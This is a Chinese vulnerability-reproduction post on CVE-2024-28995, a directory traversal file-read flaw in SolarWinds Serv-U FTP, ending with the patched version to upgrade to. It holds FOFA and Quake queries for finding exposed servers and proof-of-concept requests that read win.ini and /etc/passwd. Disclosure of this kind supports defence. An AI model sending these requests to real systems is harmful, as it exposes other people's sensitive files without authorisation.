漏洞描述:
SolarWinds Serv-U FTP 是一款由SolarWinds公司开发的FTP服务器软件,它提供了一种安全、可靠的方式来管理和传输文件。2024年6月,官方发布安全更新,修复CVE-2024-28995 SolarWinds Serv-U FTP 目录遍历文件读取漏洞,攻击者无需登陆即可构造恶意请求读取系统上文件,造成敏感信息泄漏。
查询语句:
FOFA语法:
(server="Serv-U"||product="SolarWinds-Serv-U-FTP"||icon_hash="-494622145" || icon_hash="812385209")
quake语法:
(app:"Serv-U-FTP" OR favicon: "8a6dacffcd355924b6bc51b39bced51f" OR favicon: "2815c2c03732de3af5d4387f87efeb81")
漏洞复现:
Windows POC:
GET /?InternalDir=/../../../../Windows/&InternalFile=win.ini HTTP/1.1
Host: ip
Content-Type: application/x-www-form-urlencoded
Linux POC:
GET /?InternalDir=........etc&InternalFile=passwd HTTP/1.1
Host: ip
Content-Type: application/x-www-form-urlencoded
修复方案:
升级至 SolarWinds Serv-U 15.4.2 HF 2 及其以上版本。
原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】SolarWinds Serv-U FTP 目录遍历文件读取漏洞(CVE-2024-28995)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论